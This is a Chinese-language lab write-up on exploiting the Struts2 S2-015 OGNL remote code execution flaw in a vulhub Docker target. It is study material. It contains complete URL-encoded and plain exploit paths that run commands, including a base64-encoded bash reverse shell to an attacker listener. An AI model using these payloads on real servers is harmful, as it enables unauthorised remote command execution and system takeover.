目录
这一篇参考大佬的好文章来学习+练习一下struts2远程代码执行漏洞
struts2介绍
Struts2 是一个基于MVC设计模式的流行且成熟的Web应用程序框架. Struts2不仅仅是Struts 1的新版本,它完全重写了Struts架构.
Webwork框架最初以Struts框架为基础,其目标是提供一个基于Struts的增强和改进的框架,使开发人员更容易进行Web开发.过了一段时间,Webwork框架和Struts社区携手创建着名的Struts2框架.(也可以将struts2比作于一个大的servlet)。
漏洞产生的原因
Apache Struts 2是用于开发JavaEE Web应用程序的开源Web应用框架。
Apache Struts 2.0.0至2.3.14.2版本中存在远程命令执行漏洞。
远程攻击者可借助带有‘${}’和‘%{}’序列值(可导致判断OGNL代码两次)的请求,利用该漏洞执行任意OGNL代码。
影响版本:2.0.0至2.3.14.2版本。
环境搭建
这里的环境还是使用vulhub靶场,进入到如下路径:
/opt/vulhub-master/struts2/s2-015
使用docker拉取环境
docker-compose up -d
环境拉取完成后,我们尝试在浏览器中访问一下:
可以看到是访问成功了,到此环境就搭建完成了
漏洞探测
我们在页面使用Burpsuite进行抓包,然后修改请求路径如下:
编码 /%24%7B%23context%5B%27xwork.MethodAccessor.denyMethodExecution%27%5D%3Dfalse%2C%23m%3D%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29%2C%23m.setAccessible%28true%29%2C%23m.set%28%23_memberAccess%2Ctrue%29%2C%23q%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%27echo%20Roo%20vul%27%29.getInputStream%28%29%29%2C%23q%7D.action
未编码: /${#context['xwork.MethodAccessor.denyMethodExecution']=false,#m=#_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),#m.setAccessible(true),#m.set(#_memberAccess,true),#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('echo has vul').getInputStream()),#q}.action
可以看到成功的创建了 文件
注:这里必须要使用编码的,使用未编码的是无法成功执行的
执行命令
还是进行抓包替换如下参数:
编码: /%24%7B%23context%5B%27xwork.MethodAccessor.denyMethodExecution%27%5D%3Dfalse%2C%23m%3D%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29%2C%23m.setAccessible%28true%29%2C%23m.set%28%23_memberAccess%2Ctrue%29%2C%23q%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%27id%27%29.getInputStream%28%29%29%2C%23q%7D.action
未编码:
/${#context['xwork.MethodAccessor.denyMethodExecution']=false,#m=#_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),#m.setAccessible(true),#m.set(#_memberAccess,true),#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('id').getInputStream()),#q}.action
可以看到命令成功的执行了
反弹shell
还是同样的道理,在exec()函数中写反弹shell的payload
首先在攻击机中进行监听:
然后对反弹shell的语句进行base编码:
再对paylaod进行url编码:
然后还是在访问页面时进行抓包修改路径参数:
编码加密后: /%24%7B%23context%5B%27xwork.MethodAccessor.denyMethodExecution%27%5D%3Dfalse%2C%23m%3D%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29%2C%23m.setAccessible%28true%29%2C%23m.set%28%23_memberAccess%2Ctrue%29%2C%23q%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%27%20bash%20-c%20%7Becho,IGJhc2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xNTkuMTUxLzg4ODggMD4mMQ==%7D%7C%7Bbase64,-d%7D%7C%7Bbash,-i%7D%27%29.getInputStream%28%29%29%2C%23q%7D.action
编码加密前:
/${#context['xwork.MethodAccessor.denyMethodExecution']=false,#m=#_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),#m.setAccessible(true),#m.set(#_memberAccess,true),#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(' bash -c {echo,IGJhc2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xNTkuMTUxLzg4ODggMD4mMQ==}|{base64,-d}|{bash,-i}').getInputStream()),#q}.action
查看攻击机的监听状态
可以看到已经成功的反弹到shell了
参考文章: